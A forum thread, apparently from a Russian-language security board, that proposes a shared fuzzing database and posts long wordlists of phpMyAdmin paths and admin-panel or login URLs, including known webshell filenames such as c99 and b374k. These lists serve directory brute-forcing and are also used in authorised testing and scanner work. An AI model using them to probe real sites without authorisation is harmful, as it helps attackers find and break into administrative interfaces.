fuzzing database

Discussion in 'Кухня' started by b3, 25 Dec 2018.

  1. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    А давайте соберем свою базу по фазингу. На данный момент интересует SQL INJ:
    имеем https://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database
    Так же принимаем списки по другим типам уязвимостей, особый интерес к SQL, RCE, EVAL PHP, admin panel

    Обратите внимание на extension'ы в некоторых списках. Вместо указания .php/.html/.php3 etc. указано .EXT для подстановки на лету нужного расширения под тип веб-приложения.

    phpmyadmin:
    https://gist.github.com/b3dEvilooper/8b1e9c28bed7d9ef88d931a16bd98e05
    Code:
    2phpmyadmin
    MyAdmin
    MyAdmin/scripts/setup.php
    _LPHPMYADMIN
    _myadmin
    _myadmin.php
    _phpmyadmin
    admin/phpMyAdmin
    admin/phpmyadmin
    administrator/phpMyAdmin
    administrator/phpmyadmin
    database/phpMyAdmin
    database/phpMyAdmin2
    database/phpmyadmin
    database/phpmyadmin2
    db/myadmin
    db/phpMyAdmin
    db/phpMyAdmin-2
    db/phpMyAdmin2
    db/phpmyadmin
    db/phpmyadmin2
    myadm
    myadmin
    myadmin/index.php
    myadmin/scripts/setup.php
    myadminbreeze
    myadminscripts/setup.php
    phmyadmin
    php-myadmin
    phpMyAdmi
    phpMyAdmin
    phpMyAdmin-2
    phpMyAdmin-2.10.0
    phpMyAdmin-2.10.1
    phpMyAdmin-2.10.2
    phpMyAdmin-2.10.3
    phpMyAdmin-2.11.0
    phpMyAdmin-2.11.1
    phpMyAdmin-2.11.10
    phpMyAdmin-2.11.2
    phpMyAdmin-2.11.3
    phpMyAdmin-2.11.4
    phpMyAdmin-2.11.5
    phpMyAdmin-2.11.5.1-all-languages
    phpMyAdmin-2.11.6
    phpMyAdmin-2.11.6-all-languages
    phpMyAdmin-2.11.7
    phpMyAdmin-2.11.7.1-all-languages
    phpMyAdmin-2.11.7.1-all-languages-utf-8-only
    phpMyAdmin-2.11.8.1
    phpMyAdmin-2.11.8.1-all-languages
    phpMyAdmin-2.11.8.1-all-languages-utf-8-only
    phpMyAdmin-2.11.9
    phpMyAdmin-2.2.3
    phpMyAdmin-2.2.6
    phpMyAdmin-2.5.1
    phpMyAdmin-2.5.4
    phpMyAdmin-2.5.5
    phpMyAdmin-2.5.5-pl1
    phpMyAdmin-2.5.5-rc1
    phpMyAdmin-2.5.5-rc2
    phpMyAdmin-2.5.6
    phpMyAdmin-2.5.6-rc1
    phpMyAdmin-2.5.6-rc2
    phpMyAdmin-2.5.7
    phpMyAdmin-2.5.7-pl1
    phpMyAdmin-2.6.0
    phpMyAdmin-2.6.0-alpha
    phpMyAdmin-2.6.0-alpha2
    phpMyAdmin-2.6.0-beta1
    phpMyAdmin-2.6.0-beta2
    phpMyAdmin-2.6.0-pl1
    phpMyAdmin-2.6.0-pl2
    phpMyAdmin-2.6.0-pl3
    phpMyAdmin-2.6.0-rc1
    phpMyAdmin-2.6.0-rc2
    phpMyAdmin-2.6.0-rc3
    phpMyAdmin-2.6.1
    phpMyAdmin-2.6.1-pl1
    phpMyAdmin-2.6.1-pl2
    phpMyAdmin-2.6.1-pl3
    phpMyAdmin-2.6.1-rc1
    phpMyAdmin-2.6.1-rc2
    phpMyAdmin-2.6.2
    phpMyAdmin-2.6.2-beta1
    phpMyAdmin-2.6.2-pl1
    phpMyAdmin-2.6.2-rc1
    phpMyAdmin-2.6.3
    phpMyAdmin-2.6.3-pl1
    phpMyAdmin-2.6.3-rc1
    phpMyAdmin-2.6.4
    phpMyAdmin-2.6.4-pl1
    phpMyAdmin-2.6.4-pl2
    phpMyAdmin-2.6.4-pl3
    phpMyAdmin-2.6.4-pl4
    phpMyAdmin-2.6.4-rc1
    phpMyAdmin-2.7.0
    phpMyAdmin-2.7.0-beta1
    phpMyAdmin-2.7.0-pl1
    phpMyAdmin-2.7.0-pl2
    phpMyAdmin-2.7.0-rc1
    phpMyAdmin-2.8.0
    phpMyAdmin-2.8.0-beta1
    phpMyAdmin-2.8.0-rc1
    phpMyAdmin-2.8.0-rc2
    phpMyAdmin-2.8.0.1
    phpMyAdmin-2.8.0.2
    phpMyAdmin-2.8.0.3
    phpMyAdmin-2.8.0.4
    phpMyAdmin-2.8.1
    phpMyAdmin-2.8.1-rc1
    phpMyAdmin-2.8.2
    phpMyAdmin-3
    phpMyAdmin-3.0.0
    phpMyAdmin-3.0.1
    phpMyAdmin-3.1.0
    phpMyAdmin-3.1.1
    phpMyAdmin-3.1.2
    phpMyAdmin-3.1.3
    phpMyAdmin-3.1.4
    phpMyAdmin-3.1.5
    phpMyAdmin-3.2.0
    phpMyAdmin-3.2.1
    phpMyAdmin-3.2.2
    phpMyAdmin-3.2.3
    phpMyAdmin-3.2.4
    phpMyAdmin-3.2.5
    phpMyAdmin-3.3.0
    phpMyAdmin-3.3.1
    phpMyAdmin-3.3.2
    phpMyAdmin-3.3.2-rc1
    phpMyAdmin-3.3.3
    phpMyAdmin-3.3.3-rc1
    phpMyAdmin-3.3.4
    phpMyAdmin-3.3.4-rc1
    phpMyAdmin-4
    phpMyAdmin.php
    phpMyAdmin/scripts/setup.php
    phpMyAdmin0
    phpMyAdmin1
    phpMyAdmin2
    phpMyAdmin4
    phpMyAdminBackup
    phpMyadmin
    phpmyAdmin
    phpmyadmin
    phpmyadmin-old
    phpmyadmin/scripts/setup.php
    phpmyadmin0
    phpmyadmin1
    phpmyadmin2
    phpmyadmin3
    phymyadmin
    pmyadmin
    sql/myadmin
    sql/php-myadmin
    sql/phpMyAdmin
    sql/phpMyAdmin2
    sql/phpmyadmin2
    typo3/phpmyadmin
    typo3/phpmyadmin/scripts/setup.php
    uber/phpMyAdmin
    uber/phpMyAdminBackup
    web/phpMyAdmin
    web/phpMyAdmin/scripts/setup.php
    xampp/phpmyadmin
    xampp/phpmyadmin/scripts/setup.php
    xphpMyAdmin
    Admin CP url database:
    https://gist.github.com/b3dEvilooper/57f1f955df04d6582410f33c12f02b70

    Code:
    0admin
    0manager
    1n73ction.EXT
    ADMIN
    ADMIN/login.EXT
    ADMON
    Admin
    Admin/private
    AdminTools
    AdminWeb
    Amministrazione
    Clave
    Database_Administration
    GaZa.EXT
    Indy_admin
    LiveUser_Admin
    Lotus_Domino_Admin
    PDF/SHELL.EXT
    PSUser
    Personal
    Senha
    Server
    Server.EXT
    ServerAdministrator
    Sing
    Super-Admin
    SysAdmin
    SysAdmin2
    USERNAME
    Usager
    UserLogin
    Username
    Usuario
    WebAdmin
    _adm
    _adm_
    _admin
    _admin_
    _administrator
    _administrator_
    _private
    _vti_pvt
    aadmin
    acceso.EXT
    access
    access.EXT
    account
    account.EXT
    account/index.EXT
    accounts
    accounts.EXT
    acct_login
    acesso
    adimin
    adiministrador
    adimistrador
    adm
    adm.EXT
    adm/acceso.EXT
    adm/account.EXT
    adm/adm.EXT
    adm/adm_auth.EXT
    adm/admin
    adm/admin-login.EXT
    adm/admin.EXT
    adm/adminLogin.EXT
    adm/admin_login.EXT
    adm/admincontrol.EXT
    adm/administrator.EXT
    adm/administratorlogin.EXT
    adm/adminpanel.EXT
    adm/admloginuser.EXT
    adm/affiliate.EXT
    adm/controlpanel.EXT
    adm/cp.EXT
    adm/home.EXT
    adm/index.EXT
    adm/login.EXT
    adm/memberadmin.EXT
    adm/moderator.EXT
    adm/user.EXT
    adm/usuario.EXT
    adm/usuarios.EXT
    adm/webadmin.EXT
    adm/wp-login.EXT
    adm2
    adm_auth.EXT
    adm_cp
    admcp
    admin
    admin-login
    admin-login.EXT
    admin-login/acceso.EXT
    admin-login/account.EXT
    admin-login/adm.EXT
    admin-login/adm_auth.EXT
    admin-login/admin-login.EXT
    admin-login/admin.EXT
    admin-login/adminLogin.EXT
    admin-login/admin_login.EXT
    admin-login/admincontrol.EXT
    admin-login/administrator.EXT
    admin-login/administratorlogin.EXT
    admin-login/adminpanel.EXT
    admin-login/admloginuser.EXT
    admin-login/affiliate.EXT
    admin-login/controlpanel.EXT
    admin-login/cp.EXT
    admin-login/home.EXT
    admin-login/index.EXT
    admin-login/login.EXT
    admin-login/memberadmin.EXT
    admin-login/moderator.EXT
    admin-login/user.EXT
    admin-login/usuario.EXT
    admin-login/usuarios.EXT
    admin-login/webadmin.EXT
    admin-login/wp-login.EXT
    admin.EXT
    admin.xhtml
    admin/AdminDashboard.EXT
    admin/AdminHome.EXT
    admin/CPhome.EXT
    admin/ManageAdmin.EXT
    admin/acceso.EXT
    admin/account.EXT
    admin/add-room.EXT
    admin/add-slider.EXT
    admin/add.EXT
    admin/add_banner.EXT
    admin/add_gallery_image.EXT
    admin/add_testimonials.EXT
    admin/addblog.EXT
    admin/adm
    admin/adm.EXT
    admin/adm_auth.EXT
    admin/admin
    admin/admin-home.EXT
    admin/admin-login.EXT
    admin/admin.EXT
    admin/adminLogin.EXT
    admin/admin_index.EXT
    admin/admin_login.EXT
    admin/admin_management.EXT
    admin/admin_users.EXT
    admin/adminarea.EXT
    admin/admincontrol.EXT
    admin/administrator.EXT
    admin/administratorlogin.EXT
    admin/adminpanel.EXT
    admin/adminview.EXT
    admin/admloginuser.EXT
    admin/affiliate.EXT
    admin/banner.EXT
    admin/banners_report.EXT
    admin/category.EXT
    admin/change_gallery.EXT
    admin/checklogin.EXT
    admin/configration.EXT
    admin/control_pages/admin_home.EXT
    admin/controlpanel.EXT
    admin/cp.EXT
    admin/cpanel.EXT
    admin/dash.EXT
    admin/dashboard.EXT
    admin/dashboard/index.EXT
    admin/dashbord.EXT
    admin/default.EXT
    admin/enter.EXT
    admin/event.EXT
    admin/form.EXT
    admin/fotos
    admin/gallery.EXT
    admin/headline.EXT
    admin/home.EXT
    admin/index-digital.EXT
    admin/index.EXT
    admin/index_ref.EXT
    admin/initialadmin.EXT
    admin/leads.EXT
    admin/list_gallery.EXT
    admin/log.EXT
    admin/login
    admin/login-home.EXT
    admin/login.EXT
    admin/login.EXT/admin/login.EXT
    admin/login_success.EXT
    admin/loginsuccess.EXT
    admin/main.EXT
    admin/main_page.EXT
    admin/manageImages.EXT
    admin/manage_team.EXT
    admin/member_home.EXT
    admin/memberadmin.EXT
    admin/moderator.EXT
    admin/my_account.EXT
    admin/myaccount.EXT
    admin/overview.EXT
    admin/page_management.EXT
    admin/pages/home_admin.EXT
    admin/product.EXT
    admin/products.EXT
    admin/save.EXT
    admin/slider.EXT
    admin/specializations.EXT
    admin/uhome.EXT
    admin/upload.EXT
    admin/user.EXT
    admin/userpage.EXT
    admin/usuario.EXT
    admin/usuarios.EXT
    admin/viewblog.EXT
    admin/viewmembers.EXT
    admin/voucher.EXT
    admin/webadmin.EXT
    admin/welcome.EXT
    admin/welcomepage.EXT
    admin/wp-login.EXT
    admin1
    admin1.EXT
    admin2
    admin2.EXT
    admin2/index
    admin2/index.EXT
    admin2/login.EXT
    admin3
    admin4
    admin4_account
    admin4_colon
    admin5
    adminLogin
    adminLogin.EXT
    admin_area
    admin_area.EXT
    admin_area/acceso.EXT
    admin_area/account.EXT
    admin_area/adm.EXT
    admin_area/adm_auth.EXT
    admin_area/admin-login.EXT
    admin_area/admin.EXT
    admin_area/admin.EXTuser.EXT
    admin_area/adminLogin.EXT
    admin_area/admin_login.EXT
    admin_area/admincontrol.EXT
    admin_area/administrator.EXT
    admin_area/administratorlogin.EXT
    admin_area/adminpanel.EXT
    admin_area/admloginuser.EXT
    admin_area/affiliate.EXT
    admin_area/controlpanel.EXT
    admin_area/cp.EXT
    admin_area/home.EXT
    admin_area/index.EXT
    admin_area/login.EXT
    admin_area/memberadmin.EXT
    admin_area/moderator.EXT
    admin_area/user.EXT
    admin_area/usuario.EXT
    admin_area/usuarios.EXT
    admin_area/webadmin.EXT
    admin_area/wp-login.EXT
    admin_home.EXT
    admin_login
    admin_login.EXT
    admin_login.EXT]
    admin_login/acceso.EXT
    admin_login/account.EXT
    admin_login/adm.EXT
    admin_login/adm_auth.EXT
    admin_login/admin-login.EXT
    admin_login/admin.EXT
    admin_login/adminLogin.EXT
    admin_login/admin_login.EXT
    admin_login/admincontrol.EXT
    admin_login/administrator.EXT
    admin_login/administratorlogin.EXT
    admin_login/adminpanel.EXT
    admin_login/admloginuser.EXT
    admin_login/affiliate.EXT
    admin_login/controlpanel.EXT
    admin_login/cp.EXT
    admin_login/home.EXT
    admin_login/index.EXT
    admin_login/login.EXT
    admin_login/memberadmin.EXT
    admin_login/moderator.EXT
    admin_login/user.EXT
    admin_login/usuario.EXT
    admin_login/usuarios.EXT
    admin_login/webadmin.EXT
    admin_login/wp-login.EXT
    admin_main.EXT
    admin_panel
    admin_panel.EXT
    admin_tool
    admina rea/login.EXT
    adminare
    adminarea
    adminarea/acceso.EXT
    adminarea/account.EXT
    adminarea/adm.EXT
    adminarea/adm_auth.EXT
    adminarea/admin-login.EXT
    adminarea/admin.EXT
    adminarea/adminLogin.EXT
    adminarea/admin_login.EXT
    adminarea/admincontrol.EXT
    adminarea/administrator.EXT
    adminarea/administratorlogin.EXT
    adminarea/adminpanel.EXT
    adminarea/admloginuser.EXT
    adminarea/affiliate.EXT
    adminarea/controlpanel.EXT
    adminarea/cp.EXT
    adminarea/home.EXT
    adminarea/index.EXT
    adminarea/login.EXT
    adminarea/memberadmin.EXT
    adminarea/moderator.EXT
    adminarea/user.EXT
    adminarea/usuario.EXT
    adminarea/usuarios.EXT
    adminarea/webadmin.EXT
    adminarea/wp-login.EXT
    admincontrol
    admincontrol.EXT
    admincontrol/acceso.EXT
    admincontrol/account.EXT
    admincontrol/adm.EXT
    admincontrol/adm_auth.EXT
    admincontrol/admin-login.EXT
    admincontrol/admin.EXT
    admincontrol/adminLogin.EXT
    admincontrol/admin_login.EXT
    admincontrol/admincontrol.EXT
    admincontrol/administrator.EXT
    admincontrol/administratorlogin.EXT
    admincontrol/adminpanel.EXT
    admincontrol/admloginuser.EXT
    admincontrol/affiliate.EXT
    admincontrol/controlpanel.EXT
    admincontrol/cp.EXT
    admincontrol/home.EXT
    admincontrol/index.EXT
    admincontrol/login.EXT
    admincontrol/memberadmin.EXT
    admincontrol/moderator.EXT
    admincontrol/user.EXT
    admincontrol/usuario.EXT
    admincontrol/usuarios.EXT
    admincontrol/webadmin.EXT
    admincontrol/wp-login.EXT
    admincp
    admincp/index.EXT
    admincp/login.EXT
    admincpacceso.EXT
    admincpaccount.EXT
    admincpadm.EXT
    admincpadm_auth.EXT
    admincpadmin-login.EXT
    admincpadmin.EXT
    admincpadminLogin.EXT
    admincpadmin_login.EXT
    admincpadmincontrol.EXT
    admincpadministrator.EXT
    admincpadministratorlogin.EXT
    admincpadminpanel.EXT
    admincpadmloginuser.EXT
    admincpaffiliate.EXT
    admincpcontrolpanel.EXT
    admincpcp.EXT
    admincphome.EXT
    admincpindex.EXT
    admincplogin.EXT
    admincpmemberadmin.EXT
    admincpmoderator.EXT
    admincpuser.EXT
    admincpusuario.EXT
    admincpusuarios.EXT
    admincpwebadmin.EXT
    admincpwp-login.EXT
    administer
    administer/LiveUser_Admin
    administr8
    administr8.EXT
    administracao
    administracion.EXT
    administrador
    administratie
    administration
    administration.EXT
    administrator
    administrator.EXT
    administrator/acceso.EXT
    administrator/accoun t.EXT
    administrator/account.EXT
    administrator/adm.EXT
    administrator/adm_auth.EXT
    administrator/admin-login.EXT
    administrator/admin.EXT
    administrator/adminLogin.EXT
    administrator/admin_login.EXT
    administrator/admincontrol.EXT
    administrator/administrator.EXT
    administrator/administratorlogin.EXT
    administrator/adminpanel.EXT
    administrator/admloginuser.EXT
    administrator/affiliate.EXT
    administrator/controlpanel.EXT
    administrator/cp.EXT
    administrator/home.EXT
    administrator/index.EXT
    administrator/login.EXT
    administrator/memberadmin.EXT
    administrator/moderator.EXT
    administrator/user.EXT
    administrator/usuario.EXT
    administrator/usuarios.EXT
    administrator/webadmin.EXT
    administrator/wp-login.EXT
    administratoraccounts
    administratorlogin
    administratorlogin.EXT
    administratorlogin.EXT/private.EXT
    administratorlogin.EXTadmin.EXT
    administrators
    administrators.EXT
    administrivia
    administrivia/Database_Administration/WebAdmin
    adminitem
    adminitem.EXT
    adminitems
    adminitems.EXT
    adminlogin
    adminlogin.EXT
    adminlogin/acceso.EXT
    adminlogin/account.EXT
    adminlogin/adm.EXT
    adminlogin/adm_auth.EXT
    adminlogin/admin-login.EXT
    adminlogin/admin.EXT
    adminlogin/adminLogin.EXT
    adminlogin/admin_login.EXT
    adminlogin/admincontrol.EXT
    adminlogin/administrator.EXT
    adminlogin/administratorlogin.EXT
    adminlogin/adminpanel.EXT
    adminlogin/admloginuser.EXT
    adminlogin/affiliate.EXT
    adminlogin/controlpanel.EXT
    adminlogin/cp.EXT
    adminlogin/home.EXT
    adminlogin/index.EXT
    adminlogin/login.EXT
    adminlogin/memberadmin.EXT
    adminlogin/moderator.EXT
    adminlogin/user.EXT
    adminlogin/usuario.EXT
    adminlogin/usuarios.EXT
    adminlogin/webadmin.EXT
    adminlogin/wp-login.EXT
    adminpainel
    adminpainel/acceso.EXT
    adminpainel/account.EXT
    adminpainel/adm.EXT
    adminpainel/adm_auth.EXT
    adminpainel/admin-login.EXT
    adminpainel/admin.EXT
    adminpainel/adminLogin.EXT
    adminpainel/admin_login.EXT
    adminpainel/admincontrol.EXT
    adminpainel/administrator.EXT
    adminpainel/administratorlogin.EXT
    adminpainel/adminpanel.EXT
    adminpainel/admloginuser.EXT
    adminpainel/affiliate.EXT
    adminpainel/controlpanel.EXT
    adminpainel/cp.EXT
    adminpainel/home.EXT
    adminpainel/index.EXT
    adminpainel/login.EXT
    adminpainel/memberadmin.EXT
    adminpainel/moderator.EXT
    adminpainel/user.EXT
    adminpainel/usuario.EXT
    adminpainel/usuarios.EXT
    adminpainel/webadmin.EXT
    adminpainel/wp-login.EXT
    adminpanel
    adminpanel.EXT
    adminpro
    adminpro/Lotus_Domino_Admin
    admins
    admins.EXT
    adminsite
    admistrador
    admloginuser.EXT
    admon
    affiliate.EXT
    alucar.EXT
    angel.EXT
    asp
    auth
    auth.EXT
    auth/login
    authadmin.EXT
    authenticate.EXT
    authentication.EXT
    authorize.EXT
    authuser.EXT
    autologin
    autologin.EXT
    b374k.EXT
    backdoor.EXT
    backoffice
    banneradmin
    base/admin
    bb-admin
    bb-admin/acceso.EXT
    bb-admin/account.EXT
    bb-admin/adm.EXT
    bb-admin/adm_auth.EXT
    bb-admin/admin-login.EXT
    bb-admin/admin.EXT
    bb-admin/adminLogin.EXT
    bb-admin/admin_login.EXT
    bb-admin/admincontrol.EXT
    bb-admin/administrator.EXT
    bb-admin/administratorlogin.EXT
    bb-admin/adminpanel.EXT
    bb-admin/admloginuser.EXT
    bb-admin/affiliate.EXT
    bb-admin/controlpanel.EXT
    bb-admin/cp.EXT
    bb-admin/home.EXT
    bb-admin/index.EXT
    bb-admin/login.EXT
    bb-admin/memberadmin.EXT
    bb-admin/moderator.EXT
    bb-admin/user.EXT
    bb-admin/usuario.EXT
    bb-admin/usuarios.EXT
    bb-admin/webadmin.EXT
    bb-admin/wp-login.EXT
    bbadmin
    beheer
    bestuur
    bigadmin
    blog/wp-admin
    blog/wp-login.EXT
    blogindex
    c100.EXT
    c99.EXT
    cPanel
    cadmins
    ccms
    ccms/index.EXT
    ccms/login.EXT
    ccp14admin
    cgi-bin/login
    cgi-bin/login.EXT
    cgi-bin/loginasp
    cgi-bin/loginphp
    check.EXT
    checkadmin.EXT
    checklogin.EXT
    checkuser.EXT
    cms
    cms/_admin/logon.EXT
    cms/admin
    cms/login
    cmsadmin
    cmsadmin.EXT
    cmsadmin/SysAdmin2
    config
    config.EXT
    configuration
    configure
    control
    control.EXT
    controle
    controlemanager
    controles
    controlpanel
    controlpanel.EXT
    controlpanel/acceso.EXT
    controlpanel/account.EXT
    controlpanel/adm.EXT
    controlpanel/adm_auth.EXT
    controlpanel/admin-login.EXT
    controlpanel/admin.EXT
    controlpanel/adminLogin.EXT
    controlpanel/admin_login.EXT
    controlpanel/admincontrol.EXT
    controlpanel/administrator.EXT
    controlpanel/administratorlogin.EXT
    controlpanel/adminpanel.EXT
    controlpanel/admloginuser.EXT
    controlpanel/affiliate.EXT
    controlpanel/controlpanel.EXT
    controlpanel/cp.EXT
    controlpanel/home.EXT
    controlpanel/index.EXT
    controlpanel/login.EXT
    controlpanel/memberadmin.EXT
    controlpanel/moderator.EXT
    controlpanel/user.EXT
    controlpanel/usuario.EXT
    controlpanel/usuarios.EXT
    controlpanel/webadmin.EXT
    controlpanel/wp-login.EXT
    cp
    cp.EXT
    cp/acceso.EXT
    cp/account.EXT
    cp/adm.EXT
    cp/adm_auth.EXT
    cp/admin-login.EXT
    cp/admin.EXT
    cp/adminLogin.EXT
    cp/admin_login.EXT
    cp/admincontrol.EXT
    cp/administrator.EXT
    cp/administratorlogin.EXT
    cp/adminpanel.EXT
    cp/admloginuser.EXT
    cp/affiliate.EXT
    cp/controlpanel.EXT
    cp/cp.EXT
    cp/home.EXT
    cp/index.EXT
    cp/login.EXT
    cp/memberadmin.EXT
    cp/moderator.EXT
    cp/user.EXT
    cp/usuario.EXT
    cp/usuarios.EXT
    cp/webadmin.EXT
    cp/wp-login.EXT
    cpanel
    cpanel.EXT
    cpanel.EXT/private.EXT
    cpanel_file
    customer_login
    customer_login/UserLogin
    cw.EXT
    cyberwarrior.EXT
    database_administration
    db/admin.EXT
    dir-login
    directadmin
    donos
    dq99.EXT
    edit
    edit.EXT
    editor
    ekinox.EXT
    emberadmin
    emberadmin/acceso.EXT
    emberadmin/account.EXT
    emberadmin/adm.EXT
    emberadmin/adm_auth.EXT
    emberadmin/admin-login.EXT
    emberadmin/admin.EXT
    emberadmin/adminLogin.EXT
    emberadmin/admin_login.EXT
    emberadmin/admincontrol.EXT
    emberadmin/administrator.EXT
    emberadmin/administratorlogin.EXT
    emberadmin/adminpanel.EXT
    emberadmin/admloginuser.EXT
    emberadmin/affiliate.EXT
    emberadmin/controlpanel.EXT
    emberadmin/cp.EXT
    emberadmin/home.EXT
    emberadmin/index.EXT
    emberadmin/login.EXT
    emberadmin/memberadmin.EXT
    emberadmin/moderator.EXT
    emberadmin/user.EXT
    emberadmin/usuario.EXT
    emberadmin/usuarios.EXT
    emberadmin/webadmin.EXT
    emberadmin/wp-login.EXT
    entrar
    entrar.EXT
    evmsadmin
    ezsqliteadmin
    file.EXT
    fileadmin
    fileadmin.EXT
    formslogin
    forum/admin
    funcoes
    globes_admin
    home.EXT
    hpwebjetadmin
    html
    include/admin.EXT
    includes/login.EXT
    instadmin
    instadmin/acceso.EXT
    instadmin/account.EXT
    instadmin/adm.EXT
    instadmin/adm_auth.EXT
    instadmin/admin-login.EXT
    instadmin/admin.EXT
    instadmin/adminLogin.EXT
    instadmin/admin_login.EXT
    instadmin/admincontrol.EXT
    instadmin/administrator.EXT
    instadmin/administratorlogin.EXT
    instadmin/adminpanel.EXT
    instadmin/admloginuser.EXT
    instadmin/affiliate.EXT
    instadmin/controlpanel.EXT
    instadmin/cp.EXT
    instadmin/home.EXT
    instadmin/index.EXT
    instadmin/login.EXT
    instadmin/memberadmin.EXT
    instadmin/moderator.EXT
    instadmin/user.EXT
    instadmin/usuario.EXT
    instadmin/usuarios.EXT
    instadmin/webadmin.EXT
    instadmin/wp-login.EXT
    interactive/admin.EXT
    intranet
    intronet
    irc-macadmin
    irectadmin
    isadmin.EXT
    joomla/administrator
    kacak.EXT
    key
    kpanel
    letmein
    letmein.EXT
    links/login.EXT
    log-in
    log-in.EXT
    log_in
    log_in.EXT
    logar
    login
    login-redirect
    login-redirect/sub-login
    login-us
    login.EXT
    login/login.EXT
    login1
    login1.EXT
    login1asp
    login1php
    login_admin
    login_admin.EXT
    login_adminasp
    login_adminphp
    login_db
    login_out
    login_out.EXT
    login_outasp
    login_outphp
    login_user
    login_user.EXT
    login_userasp
    login_userphp
    loginasp
    loginerror
    loginflat
    loginok
    loginphp
    logins
    loginsave
    loginsuper
    loginsuper.EXT
    loginsuperasp
    loginsuperphp
    loginuser
    loginusuarios
    logo_sysadmin
    logon
    logout
    logout.EXT
    logoutasp
    logoutphp
    macadmin
    mag/admin
    maintenance
    manage
    manage.EXT
    manage/index.EXT
    manage_admin.EXT
    management
    management.EXT
    manager
    manager.EXT
    manager/index.EXT
    manager/ispmgr
    manuallogin
    member
    member.EXT
    memberadmin
    memberadmin.EXT
    memberadmin/acceso.EXT
    memberadmin/account.EXT
    memberadmin/adm.EXT
    memberadmin/adm_auth.EXT
    memberadmin/admin-login.EXT
    memberadmin/admin.EXT
    memberadmin/adminLogin.EXT
    memberadmin/admin_login.EXT
    memberadmin/admincontrol.EXT
    memberadmin/administrator.EXT
    memberadmin/administratorlogin.EXT
    memberadmin/adminpanel.EXT
    memberadmin/admloginuser.EXT
    memberadmin/affiliate.EXT
    memberadmin/controlpanel.EXT
    memberadmin/cp.EXT
    memberadmin/home.EXT
    memberadmin/index.EXT
    memberadmin/login.EXT
    memberadmin/memberadmin.EXT
    memberadmin/moderator.EXT
    memberadmin/user.EXT
    memberadmin/usuario.EXT
    memberadmin/usuarios.EXT
    memberadmin/webadmin.EXT
    memberadmin/wp-login.EXT
    members
    members.EXT
    membro
    membros
    memlogin
    meta_login
    modcp
    modelsea rch/admin.EXT
    modelsearch
    modelsearch/acceso.EXT
    modelsearch/account.EXT
    modelsearch/adm.EXT
    modelsearch/adm_auth.EXT
    modelsearch/admin-login.EXT
    modelsearch/admin.EXT
    modelsearch/adminLogin.EXT
    modelsearch/admin_login.EXT
    modelsearch/admincontrol.EXT
    modelsearch/administrator.EXT
    modelsearch/administratorlogin.EXT
    modelsearch/adminpanel.EXT
    modelsearch/admloginuser.EXT
    modelsearch/affiliate.EXT
    modelsearch/controlpanel.EXT
    modelsearch/cp.EXT
    modelsearch/home.EXT
    modelsearch/index.EXT
    modelsearch/login.EXT
    modelsearch/memberadmin.EXT
    modelsearch/moderator.EXT
    modelsearch/user.EXT
    modelsearch/usuario.EXT
    modelsearch/usuarios.EXT
    modelsearch/webadmin.EXT
    modelsearch/wp-login.EXT
    moderator
    moderator.EXT
    moderator/acceso.EXT
    moderator/account.EXT
    moderator/adm.EXT
    moderator/adm_auth.EXT
    moderator/admin-login.EXT
    moderator/admin. 0admin/0manager
    moderator/admin.EXT
    moderator/adminLogin.EXT
    moderator/admin_login.EXT
    moderator/admincontrol.EXT
    moderator/administrator.EXT
    moderator/administratorlogin.EXT
    moderator/adminpanel.EXT
    moderator/admloginuser.EXT
    moderator/affiliate.EXT
    moderator/controlpanel.EXT
    moderator/cp.EXT
    moderator/home.EXT
    moderator/index.EXT
    moderator/login.EXT
    moderator/memberadmin.EXT
    moderator/moderator.EXT
    moderator/user.EXT
    moderator/usuario.EXT
    moderator/usuarios.EXT
    moderator/webadmin.EXT
    moderator/wp-login.EXT
    moderatorcp
    modules/admin
    modules/phpmyadmin
    myadmin
    mysql.EXT
    navSiteAdmin
    net
    news_detail.EXT
    newsadmin
    not
    noticias
    nsw
    nsw/acceso.EXT
    nsw/account.EXT
    nsw/adm.EXT
    nsw/adm_auth.EXT
    nsw/admin-login.EXT
    nsw/admin.EXT
    nsw/admin/login.EXT
    nsw/adminLogin.EXT
    nsw/admin_login.EXT
    nsw/admincontrol.EXT
    nsw/administrator.EXT
    nsw/administratorlogin.EXT
    nsw/adminpanel.EXT
    nsw/admloginuser.EXT
    nsw/affiliate.EXT
    nsw/controlpanel.EXT
    nsw/cp.EXT
    nsw/home.EXT
    nsw/index.EXT
    nsw/login.EXT
    nsw/memberadmin.EXT
    nsw/moderator.EXT
    nsw/user.EXT
    nsw/usuario.EXT
    nsw/usuarios.EXT
    nsw/webadmin.EXT
    nsw/wp-login.EXT
    openvpnadmin
    pages
    pages/acceso.EXT
    pages/account.EXT
    pages/adm.EXT
    pages/adm_auth.EXT
    pages/admin
    pages/admin-login.EXT
    pages/admin.EXT
    pages/admin/admin-login.EXT
    pages/adminLogin.EXT
    pages/admin_login.EXT
    pages/admincontrol.EXT
    pages/administrator.EXT
    pages/administratorlogin.EXT
    pages/adminpanel.EXT
    pages/admloginuser.EXT
    pages/affiliate.EXT
    pages/controlpanel.EXT
    pages/cp.EXT
    pages/home.EXT
    pages/index.EXT
    pages/login.EXT
    pages/memberadmin.EXT
    pages/moderator.EXT
    pages/user.EXT
    pages/usuario.EXT
    pages/usuarios.EXT
    pages/webadmin.EXT
    pages/wp-login.EXT
    pages/wp-login.EXTacceso.EXT
    painel
    paineldecontrole
    panel
    panel-administracion
    panel-administracion/acceso.EXT
    panel-administracion/account.EXT
    panel-administracion/adm.EXT
    panel-administracion/adm_auth.EXT
    panel-administracion/admin-login.EXT
    panel-administracion/admin.EXT
    panel-administracion/adminLogin.EXT
    panel-administracion/admin_login.EXT
    panel-administracion/admincontrol.EXT
    panel-administracion/administrator.EXT
    panel-administracion/administratorlogin.EXT
    panel-administracion/adminpanel.EXT
    panel-administracion/admloginuser.EXT
    panel-administracion/affiliate.EXT
    panel-administracion/controlpanel.EXT
    panel-administracion/cp.EXT
    panel-administracion/home.EXT
    panel-administracion/index.EXT
    panel-administracion/login.EXT
    panel-administracion/memberadmin.EXT
    panel-administracion/moderator.EXT
    panel-administracion/user.EXT
    panel-administracion/usuario.EXT
    panel-administracion/usuarios.EXT
    panel-administracion/webadmin.EXT
    panel-administracion/wp-login.EXT
    panel.EXT
    panel/?a=cp
    panelc
    paneldecontrol
    pc
    pdc
    personeel
    personeel/index.EXT
    personeel/login.EXT
    pgadmin
    photoalbum/upload
    php
    phpMyAdmin
    phpSQLiteAdmin
    phpldapadmin
    phpmyadmin
    phppgadmin
    platz_login
    pma
    power_user
    primer
    primer/estructura_organica.EXT
    priv
    priv-b374k.EXT
    priv8
    private
    private.EXT
